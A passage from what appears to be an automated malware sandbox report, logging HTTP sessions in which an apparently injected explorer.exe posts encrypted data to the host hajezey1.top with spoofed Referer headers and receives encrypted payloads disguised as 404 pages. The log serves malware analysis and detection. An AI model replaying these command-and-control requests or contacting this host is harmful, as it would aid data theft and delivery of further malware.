                                                                                                                          Oct 29, 2021 17:06:34.323163033 CEST1998OUTData Raw: 10 87 f2 e3 6d 81 a1 c4 ce 4d 79 35 76 cd 96 fe 47 13 a8 45 a7 4c 69 91 cc e6 a9 f3 88 d3 e1 82 1a c1 2c d2 1d 1d ce e3 ed df f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 9b 66 5d 02 c8 a1 c1 64 51 ab c4 09
                                                                                                                          Data Ascii: mMy5vGELi,wmwu$f]dQ$vrq`'ba`n,a/#tUS cA#YYX@G=,2hV4R{@u)D48>5,P@vTFN&cWqv8i%uZc"QpY:lPX
                                                                                                                          Oct 29, 2021 17:06:34.401909113 CEST2000INHTTP/1.1 200 OK
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 29 Oct 2021 15:06:34 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Content-Length: 0
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          15192.168.2.749781185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:06:34.488084078 CEST2002OUTPOST / HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://uoujietq.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 365
                                                                                                                          Host: hajezey1.top
                                                                                                                          Oct 29, 2021 17:06:34.488087893 CEST2002OUTData Raw: 10 87 f2 e3 6d 81 a1 c4 ce 4d 79 35 76 cd 96 fe 47 13 a8 45 a7 4c 69 91 cc e6 a9 f3 88 d3 e1 82 1a c1 2c d2 1d 1d ce e3 ed df f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 98 66 5d 02 c8 a1 c1 64 5b c8 d3 00
                                                                                                                          Data Ascii: mMy5vGELi,wmwu$f]d["}V.=d&s{evd+ O&ud\'^]j\jL:@>4@QM #iobK^WUipi;r?BJsBzOg(}BW~l~)
                                                                                                                          Oct 29, 2021 17:06:34.566710949 CEST2005INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 29 Oct 2021 15:06:34 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c d8 21 bd 40 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 67 74 d2 23 9f 87 cd 2b 80 78 51 a1 a2 8f 3c 08 d8 1c e0 32 02 50 08 08 d0 e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 81 8a 20 59 55 11 5c b8 e6 6e ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 81 ff cc 8a 40 d8 06 0e 45 87 1b 7d 87 f8 e0 04 89 f9 d4 57 80 90 70 89 ec 30 4d 6b 0e e1 a2 22 48 12 da 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 d3 e2 5f 96 da 19 d1 3a 2d 6e 44 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 99 84 4a 04 38 2d 77 14 2c d0 e8 b1 14 b9 76 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 e2 49 64 cd 25 5c 8d b7 73 24 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 f5 07 b2 be 34 56 9b 46 76 99 86 11 00 83 32 42 62 6f c9 ae 88 3b 95 36 e1 48 50 67 79 50 b8 81 be e6 81 de e3 75 6d 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 df f2 4a 0b 7d 54 7a 9c 6c 39 c0 a1 0c 5c 19 d6 63 95 be 07 3d da 9a 7e 05 22 7d e6 b2 68 60 b9 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af 5d c6 83 41 69 2f 14 b6 e8 95 19 6d 76 d6 60 83 70 56 3e 0f 60 7c aa 9f 50 54 0c f3 a6 eb 5a ed 33 bd 8a f1 7a 5b b4 18 20 5e 7a 14 f7 f2 26 2b e9 c4 ef 28 e8 98 eb e7 6c ba 25 8f fc da 14 79 a2 8e b9 08 90 bb 77 c6 19 2a 16 bf 43 b3 ea 3d b2 13 3b 35 02 1a 1b eb 22 f5 4e ad e8 16 83 83 6f d4 ed 3f ec c9 81 68 73 02 99 ea fc cd c3 05 d0 93 d3 23 39 01 c4 a5 c8 63 77 da 0b af bd d9 39 69 a1 99 9c 77 e8 0f 4e 8c da 06 b9 37 87 8c b4 26 b8 2c 58 32 77 6c 08 da f9 d2 eb 48 25 66 37 2d 2f f2 5e a5 27 48 84 89 ff 67 37 f9 bd a1 97 2b 86 f3 bd 98 bb 1f 77 c7 26 e1 39 c6 86 8e f0 09 af 63 9d 31 09 a8 50 13 30 7b 32 8c c9 e1 d5 c0 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 f8 3f d8 2c eb 53 43 ae 3b 97 e4 23 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da 07 22 bd c8 ac ef 3f ef b2 a9 a6 cc b4 02 47 71 f5 66 3c 3d d0 9f cb 67 14 d8 97 24 c8 b9 fc f0 d4 e8 57 2d 88 d5 74 61 b4 7b 69 ad 66 43 80 1c b7 16 db 64 73 98 f5 51 cf 39 c5 da 87 f1 7d 87 70 f3 35 43 50 11 00 ac 07 1d 02 c1 b9 5a 97 82 fd 11 41 a6 b2 84 35 ce 39 83 ce 85 91 3e 94 d4 54 e5 2f 62 a2 22 27 c6 b9 0a d7 d9 1b c5 89 10 ee 8b ba d7 62 47 d8 ae 85 3a 9d 9b e1 d5 f5 de 38 7f 98 92 ff b0 6a 05 8f a5 0a 9f 36 6f 03 62 53 b5 f8 80 99 8b 84 80 3f 1d b8 3a c0 b4 a7 a4 d0 91 46 e8 81 2f 0d 4d 76 00 94 23 94 b6 07 e8 9a 4a 17 7a c5 42 14 7e 24 a0 84 ba 8b 65 7d bb 8e da 3b 33 f2 82 6c 27 b4 e3 e4 ce fd 5f 98 3b c4 fe da 3d 8f f5 3f 78 14 42 7b f9 e8 f0 85 a5 46 e5
                                                                                                                          Data Ascii: 1f66S(SW\/iP"&&grq|6?eIJ5~/ar"`g1Q5ih.Kw:i/+".]pW!RY8|!@+%gt#+xQ<2P0YObyT=a'4 YU\nIXKg[Ge92)g z6@E}Wp0Mk"HI?o|6NI[LeU[0z;+W~5=PVpGZlqV@q!Uvy_:-nD%GkKm@NQ>[J8-w,v"JG0Z"?kQTJMQId%\s$&Q#F<pvA>C/CbGB4VFv2Bbo;6HPgyPum6'NGc_,/DO9W%J}Tzl9\c=~"}h`1%@N!{K.iw]Ai/mv`pV>`|PTZ3z[ ^z&+(l%yw*C=;5"No?hs#9cw9iwN7&,X2wlH%f7-/^'Hg7+w&9c1P0{2%#49FwX?,SC;#vddOU^=i=p.oj"?Gqf<=g$W-ta{ifCdsQ9}p5CPZA59>T/b"'bG:8j6obS?:F/Mv#JzB~$e};3l'_;=?xB{F
                                                                                                                          Oct 29, 2021 17:06:34.566823959 CEST2006INData Raw: bb 63 eb 97 62 c6 70 d9 31 d3 48 45 72 08 8e c1 6c c4 f3 bc f0 be bf 3e 00 d0 91 8a 2d 55 76 8c 94 be 70 8d 45 69 a1 84 05 86 e8 c6 3a 1e 4e 30 c8 3f b1 dc a7 36 0d b4 24 76 f3 61 5f ca bd d3 75 2e 18 45 3b e3 34 16 54 57 74 48 8a 38 7a ea 35 51
                                                                                                                          Data Ascii: cbp1HErl>-UvpEi:N0?6$va_u.E;4TWtH8z5Q*b!F3A2 !Stw %OM:/GIaeuJYAU{l4|Fs_B3D-BX-!,]1B]&?=mW46yH9e@
                                                                                                                          Oct 29, 2021 17:06:34.566886902 CEST2007INData Raw: 67 72 a2 98 b8 d3 52 89 bc 8c 20 84 cb 39 fc d0 e5 ac f9 cf 3b 7a de 3e 42 79 15 7c ce b7 b1 a8 ea ad 57 95 52 5a 81 7f 29 c9 f9 dc 88 2f b7 bd fd 7d 0b 9e 67 da 03 2f dc ec 4f e6 ff 9b e3 76 f3 62 85 0b 6a ac a6 cd 84 a0 d4 12 ec 6d 80 c2 b0 b9
                                                                                                                          Data Ascii: grR 9;z>By|WRZ)/}g/Ovbjm|y~;m4Y`xxgoSfC6{N\-g2~*3g2g{N<OuR<>G[DsC_pl'^{|ar)G0:RdqS=.
                                                                                                                          Oct 29, 2021 17:06:34.566951990 CEST2009INData Raw: 7d da 8b 38 8a 86 13 07 48 99 59 83 3d 9b f5 8d 3f e3 1e 40 88 84 34 4b 44 80 0e ce a3 a7 b7 09 de 10 e6 b8 03 fa 38 17 c4 b2 b7 fd 6d 6c fe 88 6c 20 1d 9e 4d a6 62 69 b7 7a a1 6a f0 1c cf da 9c f1 64 6f 76 04 46 78 de dd 49 2b e1 b4 3e 8d 24 47
                                                                                                                          Data Ascii: }8HY=?@4KD8mll MbizjdovFxI+>$G~,@X!k*b)rG2IDAH)n(up&|a%va7I^3/7A#5lIX!;RPi:Nx~(,qjSL|QK oD!
                                                                                                                          Oct 29, 2021 17:06:34.567012072 CEST2010INData Raw: eb 12 3a 1c 28 6e 5f 24 08 5b a5 35 8d 3e 23 75 c1 f7 3e b1 9a 0b d2 92 bb 22 10 1b 92 d7 78 53 f5 dc dd 4c b3 31 8d 8a 89 da b4 d0 4f 22 28 f1 dd ff 53 1a 2e c9 47 bd 1c 97 66 4c 84 55 b6 53 60 c7 a9 62 13 31 61 11 c8 31 2e 5e a8 63 f1 85 30 f7
                                                                                                                          Data Ascii: :(n_$[5>#u>"xSL1O"(S.GfLUS`b1a1.^c0dt|R4>fEc5I$J3@2m04kwg?Ha"/3vSZ`.N@oY^].PKa~}~oV_cE3Lann4?IkpT|Z
                                                                                                                          Oct 29, 2021 17:06:34.567071915 CEST2011INData Raw: ef 57 94 45 f8 84 96 14 6f 74 5f 72 c0 3b e2 07 45 c1 3c d3 e5 ce a9 91 d0 32 e8 6f cd 2d f1 c0 66 c1 58 19 4a 13 c0 ca 13 28 29 b9 27 ab a8 32 ce f9 af 78 4f be 48 8a 74 17 1b 3c 00 c3 af 8a 2c e2 e1 39 ff c9 9e 0c 59 e4 be 6a 18 33 c1 b3 4c 2b
                                                                                                                          Data Ascii: WEot_r;E<2o-fXJ()'2xOHt<,9Yj3L+h.~]~'lfeDzo=0bD?r2PV8gTSdHffs<WEEd/y]kdO]8?O_8{nA6$M)?u?q}rzJ'Op
                                                                                                                          Oct 29, 2021 17:06:34.567131996 CEST2013INData Raw: 56 78 a0 d2 a2 49 6f 98 2a a1 84 fb d1 cf 69 a5 e5 cd d0 82 5e a7 51 e1 4f 80 6d 7a 14 85 48 7a b3 53 aa bb a6 dc 19 71 77 48 2a c5 5c cd 79 23 a9 f5 10 db c9 79 8f 57 36 37 54 df 58 c5 4e 13 8e cf c4 0c c4 9b 4b e3 51 5c 65 77 65 38 47 d3 87 14
                                                                                                                          Data Ascii: VxIo*i^QOmzHzSqwH*\y#yW67TXNKQ\ewe8Gg=Bkj_(h1H]Y&'<I4:C%5M]Z\L6gg<']uBk$@HNJY]#jm?2000ov<`;oG>g67k%jK/fH
                                                                                                                          Oct 29, 2021 17:06:34.567214966 CEST2014INData Raw: a8 06 0d e8 7f 36 ac 98 7b a6 ba 34 16 c6 7d 81 b3 8c 7e 38 23 52 17 70 1d 15 9e d6 21 37 6e 61 71 d1 c1 b9 f7 0a d1 c6 ac d8 54 c3 92 ae f6 5a 93 7a 16 2f 14 d2 10 94 97 a7 54 57 be c0 ed 8e 85 63 f2 13 5b ca 46 a1 67 45 38 ae d8 46 a4 c3 68 bc
                                                                                                                          Data Ascii: 6{4}~8#Rp!7naqTZz/TWc[FgE8FhsW-\SpH:.Zzz%m,xnZ!xBz9Wl#%Wrv@K,Xlhi $zZC:"D1[7TMq;/jZH2:>+BD
                                                                                                                          Oct 29, 2021 17:06:34.567306995 CEST2016INData Raw: 70 ce c3 dc 47 33 dd 00 77 45 14 03 8c f0 3c ba bd 33 e1 ce ed 01 49 21 56 75 6a ac dd f8 b8 4a bc 5e b3 12 ae d5 21 c4 2b 71 57 e6 5b 28 9a 48 62 29 78 6c 46 82 34 bd 4d 64 79 14 b1 23 ce 19 76 b6 49 22 23 04 63 11 de d6 73 73 6b dd 23 c0 04 09
                                                                                                                          Data Ascii: pG3wE<3I!VujJ^!+qW[(Hb)xlF4Mdy#vI"#cssk#rr)2t&;Rv5gDM2hSEuud6|m{Z9[.Fi=(H'E+GsV39(%@YFPQjoiIvU8abIsOTv<G6A
                                                                                                                          Oct 29, 2021 17:06:34.567374945 CEST2017INData Raw: 31 f2 df 81 47 90 c0 26 f1 c3 34 6b ea 51 b7 be 41 2c b4 28 61 17 14 c6 fc d0 de d5 58 00 d4 35 31 dc 52 da f4 0b 45 6a d4 3b 8f 09 f8 15 1d 61 2e e0 21 8b f3 1a 1c 65 14 cd 5f 2b 10 f2 a2 26 90 3c 39 7f bb 38 66 62 02 e7 9b ea 69 4d 3c 8e fe 45
                                                                                                                          Data Ascii: 1G&4kQA,(aX51REj;a.!e_+&<98fbiM<E9#eJ@\dPYT]\ &g+rlgK@<Rq|E}e;W("+x${WBLD ro--.suEz&%ui/\kMSL{r|b
                                                                                                                          Oct 29, 2021 17:06:34.620773077 CEST2020INData Raw: 5e ae 55 64 b9 22 9f b7 dd 7c b7 23 e8 8e c6 ed fc 8c 1e 15 44 14 13 3e f5 40 ab f1 a3 58 28 57 da 2b 77 3d ed ea 9d 47 8c 2e e7 80 a1 5f f5 de 62 dc b1 48 7e 87 39 df c7 72 3a fb 6f fc f2 92 5d df 76 21 c3 6d c0 df 94 e3 71 10 73 81 88 b7 18 8a
                                                                                                                          Data Ascii: ^Ud"|#D>@X(W+w=G._bH~9r:o]v!mqs:%vmC0/4*wqE3Vd3~bSp?H>7J 9f O*u`$@>7N#fPa0/|;"a7Pq{


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          16192.168.2.749792185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:06:38.319241047 CEST2986OUTPOST / HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://byswyrncsp.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 274
                                                                                                                          Host: hajezey1.top
                                                                                                                          Oct 29, 2021 17:06:38.320457935 CEST2986OUTData Raw: 10 87 f2 e3 6d 81 a1 c4 ce 4d 79 35 76 cd 96 fe 47 13 a8 45 a7 4c 69 91 cc e6 a9 f3 88 d3 e1 82 1a c1 2c d2 1d 1d ce e3 ed df f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 84 de 98 66 5d 02 c9 a1 c1 64 4a d0 dc 0a
                                                                                                                          Data Ascii: mMy5vGELi,wmwu$f]dJ\H|Kd:Ii>xq+r-`MCWM!s<rVb>a/R,__Ql@zsmiFa}1]XId"le.FC?G14:t\RzE3:
                                                                                                                          Oct 29, 2021 17:06:38.400310040 CEST2988INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 29 Oct 2021 15:06:38 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          17192.168.2.749795185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:06:38.748987913 CEST3022OUTPOST / HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://tvwcnabmgu.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 267
                                                                                                                          Host: hajezey1.top
                                                                                                                          Oct 29, 2021 17:06:38.750273943 CEST3022OUTData Raw: 10 87 f2 e3 6d 81 a1 c4 ce 4d 79 35 76 cd 96 fe 47 13 a8 45 a7 4c 69 91 cc e6 a9 f3 88 d3 e1 82 1a c1 2c d2 1d 1d ce e3 ed df f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 99 66 5d 02 c8 a1 c1 64 4b a5 a5 77
                                                                                                                          Data Ascii: mMy5vGELi,wmwu$f]dKwH|0 G[r+VZIlD_)Q"$/HO|)l;'4uTBSg3F[(`6"HHyRQ0EyX)* #i2UNjm=sw</
                                                                                                                          Oct 29, 2021 17:06:38.827789068 CEST3024INHTTP/1.1 200 OK
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 29 Oct 2021 15:06:38 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Content-Length: 0
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          18192.168.2.749796185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:06:38.934758902 CEST3026OUTPOST / HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://jkprjvqhr.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 366
                                                                                                                          Host: hajezey1.top
                                                                                                                          Oct 29, 2021 17:06:38.934779882 CEST3026OUTData Raw: 10 87 f2 e3 6d 81 a1 c4 ce 4d 79 35 76 cd 96 fe 47 13 a8 45 a7 4c 69 91 cc e6 a9 f3 88 d3 e1 82 1a c1 2c d2 1d 1d ce e3 ed df f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 96 66 5d 02 c8 a1 c1 64 17 cb df 06
                                                                                                                          Data Ascii: mMy5vGELi,wmwu$f]dLq{EK\u3&3e}[b{HKSB,29JlqkHJ<V-/V_";/am{'v&n]LGlkgLb`6v(tppDO
                                                                                                                          Oct 29, 2021 17:06:39.014447927 CEST3027INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 29 Oct 2021 15:06:38 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          19192.168.2.749798185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:06:39.095895052 CEST3029OUTPOST / HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://maugsjqxon.com/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 162
                                                                                                                          Host: hajezey1.top
                                                                                                                          Oct 29, 2021 17:06:39.095915079 CEST3029OUTData Raw: 10 87 f2 e3 6d 81 a1 c4 ce 4d 79 35 76 cd 96 fe 47 13 a8 45 a7 4c 69 91 cc e6 a9 f3 88 d3 e1 82 1a c1 2c d2 1d 1d ce e3 ed df f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 97 66 5d 02 c8 a1 c1 64 2d ab a7 67
                                                                                                                          Data Ascii: mMy5vGELi,wmwu$f]d-gH$4YAb.:.-M1Yu(G41y?K]*SuMA,CLC-
                                                                                                                          Oct 29, 2021 17:06:39.176779985 CEST3031INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 29 Oct 2021 15:06:39 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c 81 71 e5 77 8f 8c f5 cf 9b 2b 25 9b f6 ba c9 1b b0 1c 67 74 d2 a5 98 87 cd 2b 80 78 51 a1 a2 8f bc 82 df 1c e0 32 02 50 08 88 d8 e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 01 82 20 59 55 11 5c 2c 34 67 ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 01 75 cb 8a 40 d8 06 0e 45 07 13 7d 7b f9 e0 04 89 f9 d4 57 80 90 70 89 ec be 4a 6b 0e e1 a2 22 48 92 d2 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 53 68 58 96 da 19 d1 3a 2d e8 43 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 65 85 4a 04 38 ad 7f 14 2c d0 e8 b1 14 23 71 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 62 41 64 cd 25 5c 8d 